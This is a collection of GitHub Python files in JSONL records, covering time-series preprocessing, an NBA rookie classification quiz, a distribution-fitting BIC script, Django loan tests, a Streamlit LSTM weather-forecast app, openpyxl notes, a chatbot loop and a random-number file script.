plt\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import StandardScaler\nfrom torch.utils.data import Dataset, DataLoader\nimport code_folder.train as train\n\n#data analyze tools\n\nfrom sklearn.preprocessing import normalize\n\ndef get_svd(array):\n dim = 3 \n tmp = np.array(array.x.values)[700: 2500]\n tmp = np.vstack([tmp[i: i + 300] for i in range(tmp.shape[0] - 300)])\n P, D, Q = np.linalg.svd(tmp)\n print(P.shape, D.shape, Q.shape)\n hid = P[:, : dim] @ np.diag(D[:dim])\n # val = P[:, : dim] @ np.diag(D[:dim]) @ Q[:dim]\n return hid \n\ndef stats(array, step):\n means = np.zeros((step, array.shape[1]))\n disps = np.zeros((step, array.shape[1]))\n array = normalize(array, axis = 1)\n for i in range(step):\n neigh = np.array(sorted(array, key = lambda x: np.linalg.norm(array[i] - x)))[:20]\n mean = np.mean(neigh, axis = 0)\n # # print(mean.shape, neigh.shape)\n # print((neigh - mean) ** 2)\n disp = np.mean((neigh - mean) ** 2, axis = 0)\n means[i] = mean\n disps[i] = disp\n return means, disps\n\ndef stats_periodic(array, step):\n means = np.zeros((step, array.shape[1]))\n disps = np.zeros((step, array.shape[1]))\n for i in range(step):\n dots = []\n for j in range(i, len(array), step):\n dots.append(array[j])\n dots = np.vstack(dots)\n mean = np.mean(dots, axis = 0)\n disp = np.mean((dots- mean) ** 2, axis = 0)\n means[i] = mean\n disps[i] = disp\n return means, disps\n\ndef plots(arrays, markers, to = 1000, x = 40 , y=40):\n fig = plt.figure()\n ax = fig.add_subplot(111, projection='3d')\n for arr, mark in zip(arrays, markers):\n tmp = normalize(arr, axis = 1)\n if mark is None:\n ax.plot(tmp[:, 0][:to], tmp[:, 1][:to], tmp[:, 2][:to], label='parametric curve')\n else:\n ax.plot(tmp[:, 0][:to], tmp[:, 1][:to], tmp[:, 2][:to], mark)\n ax.view_init(x, y)\n\n#SSA method\nclass SSA:\n @staticmethod\n def average_adiag(x):\n x1d = [np.mean(x[::-1, :].diagonal(i)) for i in\n range(-x.shape[0] + 1, x.shape[1])]\n return np.array(x1d)\n\n @staticmethod\n def SSA(array, emb_len, num_groups, count_in_group = 3):\n # array is 1 dimentional select num_groups * count_in_group biggest singular values\n embedded = np.vstack([array[i : i + emb_len] for i in range(array.shape[0] - emb_len) ])\n P, D, Q = np.linalg.svd(embedded)\n assert num_groups * count_in_group <= len(D)\n print(D[:10])\n groups = []\n for i in range(0, num_groups * count_in_group, count_in_group):\n tmp = (P[:, i: i + count_in_group] * D[i: i + count_in_group])\n # print(P.shape, D.shape, Q.shape, embedded.shape)\n # print(tmp.shape, Q[..., i: i + count_in_group].shape)\n tmp = tmp @ Q[i: i + count_in_group]\n # print(tmp.shape)\n tmp = SSA.average_adiag(tmp)\n # print(tmp.shape)\n # break\n groups.append(tmp)\n \n return groups\n\n @staticmethod\n def apply_SSA(array, emb_len, count_in_group):\n # возвращает результат применения гусеницы отдельно к осям\n rez = []\n for i in range(array.shape[1]):\n tmp = SSA.SSA(array[..., i], emb_len, 1 , count_in_group)\n rez.append(tmp[0])\n return np.vstack(rez)\n\n\n\n# dataPreprocessing tools\nclass DataPreprocess:\n \"\"\"\n there all functions which preprocess data\n \"\"\" \n @staticmethod\n def get_interpolation(data, time_axis, data_axis, linear = True):\n \"\"\"\n Линейная интерполяция данных.\n Нужно для выравнивания времен измерения\n \"\"\"\n data_times = torch.tensor(np.array(data[time_axis]))\n data_linear = torch.tensor(np.array(data[data_axis]))\n if linear:\n data_coeffs = cde.linear_interpolation_coeffs(data_linear, data_times)\n data_interploation = cde.LinearInterpolation(data_coeffs, data_times)\n else: # else we use qubic interpolation\n data_coeffs = cde.natural_cubic_spline_coeffs(data_linear, data_times)\n data_interploation = cde.CubicSpline(data_coeffs, data_times)\n return data_interploation\n \n @staticmethod\n def align_by_time(X_data, Y_data, time_axis, data_axis, t = None, linear = True):\n all_axis = [time_axis] + data_axis\n if not (set(all_axis) <= set(X_data.columns) and set(all_axis) <= set(X_data.columns) ): raise ValueError(\"time_axis and data axis must be in data axis\")\n \n X_interpolation = DataPreprocess.get_interpolation(X_data, time_axis, data_axis, linear)\n Y_interpolation = DataPreprocess.get_interpolation(Y_data, time_axis, data_axis, linear)\n if t is None:\n t = X_interpolation.grid_points\n align_x = torch.vstack([X_interpolation.evaluate(t_i) for t_i in t])\n align_y = torch.vstack([Y_interpolation.evaluate(t_i) for t_i in t])\n\n align_x = torch.hstack([t.reshape(-1, 1), align_x]).numpy()\n align_y = torch.hstack([t.reshape(-1, 1), align_y]).numpy()\n\n print(align_x.shape)\n align_x = pd.DataFrame(align_x, columns = [ time_axis, *data_axis])\n align_y = pd.DataFrame(align_y, columns = [ time_axis, *data_axis])\n return align_x, align_y\n\n @staticmethod\n def time_to_delta_t(data, time_axis):\n if time_axis not in data.columns: raise ValueError(f\"{time_axis} not in data.columns\")\n data[time_axis].iloc[:-1] = np.array(data[time_axis])[1:] - np.array(data[time_axis])[:-1]\n return data.iloc[:-1]\n\n\n @staticmethod\n def normalize(data, axis):\n if not (set(axis) <= data.columns): raise ValueError(\"axis must be in\")\n normalizer = StandardScaler()\n data[axis] = normalizer.fit_transform(data[axis])\n return data, normalizer\n \n @staticmethod\n def train_test_split(X, y, t, train_ratio = 0.75):\n X_train, X_test, y_train, y_test, t_train, t_test = train_test_split(\n X, y, t,\n train_size=train_ratio,\n shuffle=False\n )\n return X_train, X_test, y_train, y_test, t_train, t_test\n\n\nclass DatasetReady(Dataset):\n def __init__(self, X, t, embed_dim = -1):\n self.X = torch.tensor( np.array(X))\n self.t = torch.tensor( np.array(t))\n if embed_dim < 0: embed_dim = X.shape[0] - 1\n self.embed_dim = embed_dim\n self.len = X.shape[0] - embed_dim\n def __len__(self):\n return self.len\n def __getitem__(self, index):\n return self.X[index: index + self.embed_dim].T, self.X[index + self.embed_dim].T, self.t[index: index + self.embed_dim]\n\ndef get_datasets_pair(X_data, Y_data, emb_dim, data_axis, train_ratio = 0.75, batch_size = 200, shuffle = True):\n # функция для работы с данными акселерометра и гироскопа\n time_axis = \"seconds_elapsed\"\n if set(X_data.columns) != set(Y_data.columns): raise ValueError(\"Жесть\")\n if not (set(data_axis) <= set(X_data.columns)): raise ValueError(\"Жесть\")\n \n preprocessor = DataPreprocess()\n X_data, Y_data = preprocessor.align_by_time(X_data, Y_data, time_axis, data_axis)\n X_data, Y_data = preprocessor.time_to_delta_t(X_data, time_axis), preprocessor.time_to_delta_t(Y_data, time_axis)\n data_len = X_data.shape[0]\n X_train, X_test = X_data[: int(data_len * train_ratio) ], X_data[int(data_len * train_ratio):]\n Y_train, Y_test = Y_data[: int(data_len * train_ratio) ], Y_data[int(data_len * train_ratio):]\n \n X_train, X_test = DatasetReady(X_train[data_axis], X_train[time_axis], emb_dim) , DatasetReady(X_test[data_axis], X_test[time_axis], emb_dim)\n Y_train, Y_test = DatasetReady(Y_train[data_axis], Y_train[time_axis], emb_dim) , DatasetReady(Y_test[data_axis], Y_test[time_axis], emb_dim)\n\n X_train, X_test = DataLoader(X_train, batch_size, shuffle), DataLoader(X_test, batch_size, shuffle)\n Y_train, Y_test = DataLoader(Y_train, batch_size, shuffle), DataLoader(Y_test, batch_size, shuffle)\n\n return X_train, X_test, Y_train, Y_test \n\n","repo_name":"intsystems/2023-Project-117","sub_path":"code/code_folder/tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":8477,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"74906615203","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[31]:\n\n\n#################################\n# Your Info\n# Please fill out the following questions:\n\n# Your name: David Romo\n\n# Your section: DSI 2-22-E\n\n# Your email: david.romo.0802@gmail.com\n\n#################################\n\n\n# In[77]:\n\n\n# Import the libraries you need\n# standard imports\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\n# modeling imports\nfrom sklearn.linear_model import LinearRegression, LogisticRegression\nfrom sklearn.metrics import mean_squared_error, r2_score\nfrom sklearn.model_selection import train_test_split, cross_val_score\nfrom sklearn.preprocessing import StandardScaler\n\n# Read in the data: data/nba_rookies.csv\ndf = pd.read_csv('./data/nba_rookies.csv')\n\n\n# In[78]:\n\n\n# Process data:\n# 1. Set the 'Name' column as the index\ndf.set_index('Name', inplace=True)\n# 2. Convert the 'TARGET_5Yrs' column to 0/1 using 0 for 'No' and 1 for 'Yes'\ndf['TARGET_5Yrs'] = df['TARGET_5Yrs'].map({'No':0, 'Yes':1})\n\n\n# In[86]:\n\n\n# Model data using any classification algorithm you would like\n# If you do not know what to do here, feel free to fit a Logistic Regression model with default hyperparameters\n# But you are free to use any other model or methods that you know if you think that would be better!\n# Use a random state of 42 when splitting your data into training and testing\nX = df.drop(columns='TARGET_5Yrs')\ny = df['TARGET_5Yrs']\n\n# Train test split\nX_train, X_test, y_train, y_test = train_test_split(X,y,stratify=y, random_state=42)\n\n# Scale Data\nsc = StandardScaler()\nX_train_sc = sc.fit_transform(X_train)\nX_test_sc = sc.fit_transform(X_test)\n\n# Instantiate & Fit Model\nlogreg = LogisticRegression()\nlogreg.fit(X_train_sc, y_train)\n\n\n# In[87]:\n\n\n# Generate predictions on your test data\npreds = logreg.predict(X_test)\n\n\n# In[88]:\n\n\npreds\n\n\n# In[89]:\n\n\n# Create a new DataFrame for predictions\n# 1. Have an index that is the name of the player\n# 2. Have one column called 'predictions' which is the predictions from your model on your test data df_preds['predictions'] = preds\ndf_dict = {\n 'predictions': preds,\n 'Name' : df.index\n}\n\ndf_preds = pd.DataFrame(df_dict)\ndf_preds.set_index('Name', inplace=True)\n\n\n# In[92]:\n\n\n# Write the DataFrame you created to a csv called 'predictions.csv' in the data folder in this repository\ndf.to_csv('predictions.csv')\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"d-romo/dsi-capstone","sub_path":"Quizes/03-Quiz-master/Untitled.py","file_name":"Untitled.py","file_ext":"py","file_size_in_byte":2404,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"1928978858","text":"\"\"\"\nHere we model the Ground Probability distribution Function (PDF) of the similarity scores\ntaxonomy labels with 1000 random Wikipedia articles.\nWe consider three candidate PDFs: Gaussian, Gumbel and Log-Normal distribution.\nWe use Baysian Information Critiria (BIC) to select the most appropriate distribution: the \nBIC of each PDF is computed for every label and averaged for each dataset.\n\"\"\"\n\nfrom typing import List\nfrom glob import glob\nimport numpy as np\nfrom scipy.stats import gumbel_r, norm, expon, halfnorm, lognorm\nfrom src.utils import FileIO\nfrom src.hyper_inference import DistributionEstimator\nfrom src.encoders import ZeroShooterZSTC\nfrom src.dataset import WebOfScience, AmazonHTC, DBPedia\nfrom globals import Paths\n\n\ndef BIC(data_points: List[float], pdf, k: int, n_bins: int) -> float:\n '''Compute Baysian Information Criterion (BIC)\n\n Parameters\n ----------\n model: Any - fitted model we are computing the BIC on\n k: int - number of free parameters of the model\n n_bins: int - number of bins to build the pdf out of the data_points\n\n Return\n ------\n bic_score: flaot - BIC score of the model\n '''\n # Build histogram to build pdf of datapoints.\n Y, bins = np.histogram(data_points, bins=n_bins, density=True)\n # Set X values as the center of the bins.\n X = np.array([(bins[i + 1] + bins[i]) / 2 for i in range(len(bins) - 1)])\n Y_hat = pdf(X)\n n = len(Y)\n sigma_e = np.sum((Y - Y_hat) ** 2) / n\n # Compute and return BIC.\n return n * np.log(sigma_e) + k * np.log(n)\n\n\nif __name__ == '__main__':\n\n DATASETS = {'Wos': WebOfScience, 'DBPedia': DBPedia, 'Amazon': AmazonHTC}\n\n for name, DataSet in DATASETS.items():\n\n COMPUTE_SCORES = False\n if COMPUTE_SCORES:\n data = DBPedia('test', 1)\n labels = data.labels_flat\n encoder = ZeroShooterZSTC('all-mpnet-base-v2')\n wiki_docs = [FileIO.read_text(filename) for filename in glob(f'{Paths.WIKI_DIR}/*')]\n scores = encoder.compute_labels_scores(wiki_docs, labels)\n label2scores = {l: [float(x) for x in s] for l, s in zip(labels, np.transpose(scores))}\n FileIO.write_json(label2scores, f'{Paths.MAIN_DIR}/saves/{name}Labels2wikiscores.json')\n\n\n print(f\"\\n\\n--------------------- {name} --------------------\\n\")\n\n label2scores = FileIO.read_json(f'{Paths.MAIN_DIR}/saves/{name}Labels2wikiscores.json')\n n_labels = len(label2scores)\n FUNCS = [\n {'name': 'Gaussian', 'func': norm, 'n_pars': 2},\n {'name': 'Gumbel', 'func': gumbel_r, 'n_pars': 2},\n {'name': 'LogNorm', 'func': lognorm, 'n_pars': 3}\n ]\n\n for function in FUNCS:\n\n name = function['name']\n func = function['func']\n n_pars = function['n_pars']\n\n avg_bic = 0\n for label, label_scores in label2scores.items():\n fitted_pars = func.fit(label_scores)\n rv = func(*fitted_pars)\n avg_bic += BIC(label_scores, rv.pdf, n_pars, 100)\n\n print(f'Dataset: {name}, avg. BIC: {avg_bic / n_labels}')\n","repo_name":"bong-yo/TaxonomyZeroShooter","sub_path":"ground_PDF_modelling.py","file_name":"ground_PDF_modelling.py","file_ext":"py","file_size_in_byte":3151,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"16496350885","text":"import streamlit as st\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nimport tensorflow\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Dense\nfrom tensorflow.keras.layers import Dropout\nfrom tensorflow.keras.layers import LSTM\nfrom sklearn.preprocessing import MinMaxScaler\nfrom sklearn.metrics import mean_squared_error\nfrom scipy.interpolate import interp1d\nimport os\nimport sys\nfrom io import StringIO\nimport pathlib\n\ncurrent_path = pathlib.Path(__file__).parent.absolute()\ncurrent_path = str(current_path)\ncurrent_path = current_path.replace(\"\\\\\",\"/\")\n\nst.title(\"Weather forecast\")\nst.sidebar.title(\"What to do\")\ndataset = st.sidebar.selectbox(label=\"Select a dataset\", index=0, options=[\"jena_climate_2009_2016\"])\nactivities = [\"Exploratory Data Analysis\", \"Plotting and Visualization\", \"Building Model & Testing\", \"Forecasting using Model\", \"About\"]\nchoice = st.sidebar.selectbox(\"Select Activity\", activities)\nif dataset == \"jena_climate_2009_2016\":\n import zipfile\n uri = \"https://storage.googleapis.com/tensorflow/tf-keras-datasets/jena_climate_2009_2016.csv.zip\"\n zip_path = tensorflow.keras.utils.get_file(origin=uri, fname=\"jena_climate_2009_2016.csv.zip\")\n zip_file = zipfile.ZipFile(zip_path)\n zip_file.extractall()\n csv_path = \"jena_climate_2009_2016.csv\"\n df = pd.read_csv(csv_path)\n\ndef resample():\n df['Date Time'] = pd.to_datetime(df['Date Time'])\n df.set_index('Date Time', inplace=True)\n data = df.resample('60T').mean()\n return data\n\ndata = resample()\n\nif choice == \"Exploratory Data Analysis\":\n if st.checkbox(\"Show Dataset\"):\n st.dataframe(df.head())\n if st.checkbox(\"Show columns\"):\n st.write(df.columns)\n if st.checkbox(\"Show shape\"):\n st.write(df.shape)\n if st.checkbox(\"Summary of DataSet\"):\n st.write(df.describe())\n if st.checkbox(\"Value Counts\"):\n st.write(df.count())\n if st.checkbox(\"Show Dataset after resampling\"):\n st.dataframe(data.head())\n if st.checkbox(\"Show shape after resampling\"):\n st.write(data.shape)\n if st.checkbox(\"Value Counts after resampling\"):\n st.write(data.count())\n\n\ndef interpolate(data):\n data = data[['T (degC)']]\n data['T (degC)'] = data['T (degC)'].interpolate()\n return data\ndata = interpolate(data)\n\nif choice == \"Plotting and Visualization\":\n all_columns = df.columns.tolist()\n if st.checkbox(\"Temperature Plot\"):\n st.title('Temperature Series')\n st.line_chart(data)\n if st.checkbox(\"Correlation Heatmap\"):\n st.write(sns.heatmap(df.corr(), annot=True, linewidths=.5, annot_kws={\"size\": 7}))\n st.pyplot()\n\ndef scaling_data(data):\n data = data.values\n data = data.astype('float32')\n scaler = MinMaxScaler(feature_range=(-1, 1))\n sc = scaler.fit_transform(data)\n return data, scaler, sc\ndata, scaler, sc = scaling_data(data)\n\ndef split_data(data, sc):\n timestep = 36\n\n X = []\n Y = []\n\n for i in range(len(sc) - (timestep)):\n X.append(sc[i:i + timestep])\n Y.append(sc[i + timestep])\n\n X = np.asanyarray(X)\n Y = np.asanyarray(Y)\n\n k = 69000\n Xtrain = X[:k, :, :]\n Xtest = X[k:, :, :]\n Ytrain = Y[:k]\n Ytest = Y[k:]\n\n return Xtrain, Xtest, Ytrain, Ytest\n\nXtrain, Xtest, Ytrain, Ytest = split_data(data=data, sc=sc)\n\n\n\n# THIS NEXT COMMENTED BLOCKS OF CODE IS FOR MODEL BUILDING AND FITTING BUT SINCE IT TAKES TIME FOR THE MODEL TO RUN,\n# WE HAVE ALREADY RUN IT AND LOADED THE SAVED MODEL.\n\n# model = Sequential()\n# model.add(LSTM(32,activation = 'relu', input_shape= (36,1), return_sequences=True))\n# model.add(LSTM(32, activation='relu', return_sequences=True))\n# model.add(LSTM(32, activation='sigmoid', return_sequences=False))\n# model.add(Dense(32))\n# model.add(Dropout(0.3))\n# model.add(Dense(1))\n# model.compile(optimizer='adam', loss='mse')\n\n# callback = tensorflow.keras.callbacks.EarlyStopping(monitor='loss', patience=3)\n# history = model.fit(Xtrain,Ytrain,epochs=15, verbose=1, callbacks=[callback])\n\n\nmodel = tensorflow.keras.models.load_model(current_path+\"/model.h5\")\n\n# Prediction for Xtest and then inverse transforming for plotting Ytest and Predicted values\npreds= model.predict(Xtest)\npreds = scaler.inverse_transform(preds)\n\nYtest=np.asanyarray(Ytest)\nYtest=Ytest.reshape(-1,1)\nYtest = scaler.inverse_transform(Ytest)\n\nYtrain=np.asanyarray(Ytrain)\nYtrain=Ytrain.reshape(-1,1)\nYtrain = scaler.inverse_transform(Ytrain)\n\ntest_df = pd.DataFrame(Ytest,columns=['Actual'])\npred_df = pd.DataFrame(preds,columns=['Predicted'])\nconcat_table = pd.concat([test_df,pred_df],axis=1)\n\ntest = Ytest.flatten()\npred = preds.flatten()\n\nold_stdout = sys.stdout\nsys.stdout = mystdout = StringIO()\n\nif choice == \"Building Model & Testing\":\n if st.checkbox(\"Model Summary\"):\n model.summary()\n if st.checkbox(\"(MSE) Ytest VS Predicted_Ytest\"):\n st.write(mean_squared_error(Ytest,preds))\n if st.checkbox(\"Plot Ytest VS Predicted_Ytest\"):\n plt.rcParams.update({'font.size': 20})\n fig, ax= plt.subplots(1,1, figsize=(20,9))\n ax.plot(range(1045,1093),test[1045:], 'b', label=\"Test\")\n ax.plot(range(1045,1093),pred[1045:], 'r', label=\"Predicted\")\n ax.set_xlabel('Final 48 hours observations of test data')\n ax.set_ylabel('Temperature')\n legend = ax.legend()\n legend.get_frame().set_alpha(0.5)\n st.pyplot(fig)\n if st.checkbox(\"Values Ytest VS Predicted_Ytest\"):\n st.write(concat_table)\n\nsys.stdout = old_stdout\nst.text(mystdout.getvalue())\n\ndef insert_end(Xin,new_input):\n timestep = 36\n for i in range(timestep-1):\n Xin[:, i, :] = Xin[:, i+1, :]\n Xin[:, timestep-1, :] = new_input\n return Xin\n\nfirst =1070\nfuture=1153\nforcast = []\nXin = Xtest[first:first+1,:,:]\nfor i in range(first,future+1):\n out = model.predict(Xin, batch_size=1)\n forcast.append(out[0,0])\n Xin = insert_end(Xin,out[0,0])\nforcasted_output=np.asanyarray(forcast)\nforcasted_output=forcasted_output.reshape(-1,1)\nforcasted_output = scaler.inverse_transform(forcasted_output)\n\nYtest_1d = Ytest.flatten()\nforcasted_output_1d = forcasted_output.flatten()\n\nif choice == \"Forecasting using Model\":\n if st.checkbox(\"Complete Graph of Ytest and Forecast\"):\n plt.rcParams.update({'font.size': 20})\n fig, ax = plt.subplots(1, 1, figsize=(20, 9))\n ax.plot(range(0, 1093), Ytest_1d, 'b', label=\"History\")\n ax.plot(range(1093, 1093 + 60), forcasted_output_1d[:60], 'r', label=\"Forecasted\")\n ax.set_xlabel('Time Step')\n ax.set_ylabel('Temperature')\n legend = ax.legend()\n legend.get_frame().set_alpha(0.5)\n st.pyplot(fig)\n if st.checkbox(\"Forecast future 24 hours (1 Day)\"):\n plt.rcParams.update({'font.size': 20})\n fig, ax = plt.subplots(1, 1, figsize=(20, 9))\n ax.plot(range(1069, 1093), Ytest_1d[1069:1093], 'b', label=\"History\", marker='o')\n ax.plot(range(1093, 1093 + 24), forcasted_output_1d[:24], 'r', label=\"Forecasted\", marker='o')\n ax.set_xlabel('Time Step')\n ax.set_ylabel('Temperature')\n legend = ax.legend()\n legend.get_frame().set_alpha(0.5)\n st.pyplot(fig)\n if st.checkbox(\"Forecast future 48 hours (2 Days)\"):\n plt.rcParams.update({'font.size': 20})\n fig, ax = plt.subplots(1, 1, figsize=(20, 9))\n ax.plot(range(1069, 1093), Ytest_1d[1069:1093], 'b', label=\"History\", marker='o')\n ax.plot(range(1093, 1093 + 48), forcasted_output_1d[:48], 'r', label=\"Forecasted\", marker='o')\n ax.set_xlabel('Time Step')\n ax.set_ylabel('Temperature')\n legend = ax.legend()\n legend.get_frame().set_alpha(0.5)\n st.pyplot(fig)\n if st.checkbox(\"Temperature Values table of Forecast\"):\n st.write(forcasted_output[0:72])\n\n# REFERENCES\n# https://www.tensorflow.org/tutorials/structured_data/time_series\n# https://docs.streamlit.io/en/stable/\n# https://www.tensorflow.org/guide/keras/save_and_serialize\n# https://keras.io/examples/timeseries/timeseries_weather_forecasting/","repo_name":"koushikchimakurthi/TimeSeriesForecast_Temperature","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8105,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"37989803444","text":"#Проверим как работает вставка строки на объёденённые ячейки\nws.merge_cells('D4:E8')\n# Добавить новую строку с данными на лист ws в конец листа\nws.append([1,2,3,41,51,6,7,8,9,10,11,12,13,14,15])# как видно часть данных пропала и вставка строки пошла на следующкю, так как запись происходит в конец файла, ,ошибки не было\n# Добавить новую строку с данными на лист ws в конец листа\nws.append([1,2,3,42,52,6,7,8,9,10,11,12,13,14,15])# тут тоже пропала часть данных,ошибки не было\nws.insert_rows(6) #вставить строку на 6 позицию, все данные сохронятся вставится пустая строка\nws.append([1,22,3,42,52,6,7,8,9,10,11,12,13,14,15]) # но данные вставятся только через 2 строки, в общем кривоватая библиотека немного, но это не беда\n#удалит столбец с данными\nws.delete_cols(5) #объяденённые ячейки не тронит\n#Вывод: лучще повторно открывать документ для корректировки строк и столбцов, а для вставки данных также\n\n#Сгрупировать столбцы\nws.column_dimensions.group('A','D')\n#Сгрупировать и скрыть строки\nws.row_dimensions.group(1,10, hidden=True)\nws['A']\n#Создать новый лист в книге\nws2 = wb.create_sheet(\"test_worksheet_2\", 1)# пораметр, показывает где в списке листов создать лист\n#Присвоить цвет значку листа\nws2.sheet_properties.tabColor = \"1072BA\"#hex код цвета\n#Выводим список имён листов книги\nprint(wb.sheetnames)\n#Копировать лист\nws3=wb.copy_worksheet(ws)\n#Меняем название листа\nws3.title=\"test_copy\"\n#Копировать лист 2\nws4=wb.copy_worksheet(ws2)# По кмолчанию добавляется \" Copy\" к названию листа\n#Копировать лист 2 повторно и удалим\nws5=wb.copy_worksheet(ws2)\nprint(wb.sheetnames)\n#Удалить лист\nwb.remove(ws5)\nprint(wb.sheetnames)\n# Поменять листы местами\n# выбираем имена\na=wb.sheetnames\n#определяем порядок следования листов\nwb._sheets =[wb[a[1]],wb[a[0]],wb[a[2]],wb[a[3]]]\n#Сохранить книгу по имени\nwb.save(\"test_workbook.xlsx\")\n#Закрыть книгу\nwb.close()\n'''Работа со стилями, фильтрами'''\n#Открытие существкющей книги \n#Открыть книгу по имени\nwb = openpyxl.load_workbook('test_workbook.xlsx')#Для быстроты чтения при работе с данными лучше ставить аргумент read_only=True, но тогда многие переменные не используются\nws=wb[\"test_copy\"]\n\n# Выбрать область под фильтрацию и сортировку\nws.auto_filter.ref = \"A1:N10\"\nws.auto_filter.add_filter_column(0, [1]) #Добавляем фильтр про списку значений, пробывал доавляется только значёк\nws.auto_filter.add_sort_condition(\"C2:C10\") #Делаем значёк сортировки, пробывал добавляется только значёк\n#проблемма реuается перестоновкой данных столбцов и скрытием строк, например так\nws.column_dimensions['B'].hidden= True\nwb.save(\"test_workbook1.xlsx\")\nwb.close()\n\n\n\nfrom openpyxl.utils import FORMULAE# множество формул\n#переведём в кортеж\na=tuple(FORMULAE)\n#вывидим часть получившегося кортежа\nfor i in range(10):\n print(a[i])\n","repo_name":"aleksey-for-some-build/INFO","sub_path":"lib_inf/openpyxl.py","file_name":"openpyxl.py","file_ext":"py","file_size_in_byte":4158,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"28155539871","text":"from django.test import TestCase\nfrom loans.models import Loan\nfrom copys.models import Copy\nfrom users.models import User\nfrom books.models import Book\n\nclass LoanModelTest(TestCase):\n @classmethod\n def setUpTestData(cls) -> None:\n # cls -> class\n book_data={\n \"title\": \"Moby Dick2\",\n\t \"category\":\"aventura\",\n\t \"realese_date\": \"2000-01-01\",\n\t \"synopsis\": \"Passado no mar, o livro conta a história de um navio baleeiro que persegue e ataca várias vezes um cachalote sem conseguir matá-lo.\",\n\t \"author\": \"Herman Melville\",\n\t \"quantity\": 10\n }\n\n book = Book.objects.create(**book_data)\n user = User.objects.create()\n copy = Copy.objects.create(book=book)\n\n cls.loan = Loan.objects.create(user=user, copy=copy)\n\n cls.loan_data = {\n \"borrowed_date\": None,\n\t \"devolution_date\": None,\n\t \"is_devoluted\": False,\n\t \"blocked_until\": None,\n\t \"copy\": copy,\n \"user\": user\n }\n\t\t \n\t\n def test_loans_fields(self):\n self.assertEqual(\n self.loan.borrowed_date,\n self.loan_data[\"borrowed_date\"],\n )\n\n self.assertEqual(\n self.loan.devolution_date,\n self.loan_data[\"devolution_date\"],\n \n )\n\n self.assertEqual(\n self.loan.is_devoluted,\n self.loan_data[\"is_devoluted\"],\n )\n\n self.assertEqual(\n self.loan.blocked_until,\n self.loan_data[\"blocked_until\"],\n )\n\n self.assertEqual(\n self.loan.copy,\n self.loan_data[\"copy\"],\n )\n\n self.assertEqual(\n self.loan.user,\n self.loan_data[\"user\"],\n )\n","repo_name":"bielssinho/backend-project-library","sub_path":"loans/tests/test_loan_model.py","file_name":"test_loan_model.py","file_ext":"py","file_size_in_byte":1763,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"25678827460","text":"# @file functions.py\n#\n# TUTORIAL FUNCTIONS\n#\n# Functions required for implementing tutorial scripts.\n#\n# @author Samuel Farrens\n# @version 1.0\n# @date 2015\n#\n\nimport numpy\nfrom psf import *\n\n\ndef gradient_descent(image, psf):\n\n grad_op = operators.StandardPSF(image, psf, data_format='map')\n grad_op.get_spec_rad(tolerance=1e-6, max_iter=10)\n\n opt = optimisation.ForwardBackward(numpy.ones(image.shape), grad_op,\n prox=linear.Identity(),\n cost=None)\n\n return opt.x_final\n","repo_name":"sfarrens/notebooks","sub_path":"Tutorial/tutorial_functions.py","file_name":"tutorial_functions.py","file_ext":"py","file_size_in_byte":566,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"41878650368","text":"#python3\n#常に条件を満たす\nwhile True:\n #ユーザーからの入力を受け取る\n command = input('pybot> ')\n #[こんにちは]を含む場合\n if 'こんにちは' in command:\n print('コンニチハ')\n #[ありがとう]を含む場合\n elif 'ありがとう' in command:\n print('ドウイタシマシテ')\n #[さようなら]を含む場合\n elif 'さようなら' in command:\n print('サヨウナラ')\n #繰り返し処理を終了する\n break\n #一致しない場合\n else:\n print('ナニヲイッテルカ、ワカラナイヨ!!')\n","repo_name":"tokuharu/meganeman","sub_path":"pybot.py","file_name":"pybot.py","file_ext":"py","file_size_in_byte":626,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"32817291044","text":"#Braxton Phillips\r\n#SDEV 140\r\n#M03 Chapter 6 Exercise 7 & 8\r\n#Random number file writer and reader\r\n\r\n#importing the random module to utilize the randit function\r\nimport random\r\ndef main():\r\n try:\r\n total = 0 #used to accumulate the total the numbers are processed by the control loop\r\n number_file = open('randoms.txt','w') #by opening the randoms text file in write mode, i can call it from the other funcs as a parameter \r\n print('Hello, this program will creat a list of random number and write them to a file before reading them back to you.')\r\n userInt = int(input('Please indicate how many random numbers you would like to create.\\n'))\r\n\r\n for count in range(0, userInt):\r\n number = random.randint(1,500)\r\n count += 1\r\n total += number\r\n writer(number_file, number)\r\n number_file.close\r\n\r\n #excerise 8\r\n print('\\nBelow are the numbers from the randoms.txt file:')\r\n number_file = open('randoms.txt','r')\r\n for line in number_file:\r\n reader(line)\r\n print('There were ', userInt, ' numbers listed in the randoms.txt file. Their total is ', total,'!', sep='')\r\n except Exception as err:\r\n print(err)\r\n\r\n#fucntion for excerise 7\r\ndef writer(number_file, number):\r\n number_file.write(str(number) + '\\n')\r\n\r\n#function for excerise 8 although it prints the variables as a string unstead of int\r\ndef reader(line):\r\n line = line.rstrip('\\n')\r\n print(line)\r\n \r\nmain()","repo_name":"braxtonphillips/SDEV140","sub_path":"PhillipsBraxtonM03_Ch6Ex7_8.py","file_name":"PhillipsBraxtonM03_Ch6Ex7_8.py","file_ext":"py","file_size_in_byte":1522,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"8046767668","text":"__copyright__ = 'Copyright 2022, 3Liz'\n__license__ = 'GPL version 3'\n__email__ = 'info@3liz.org'\n\nfrom qgis.server import QgsServerInterface, 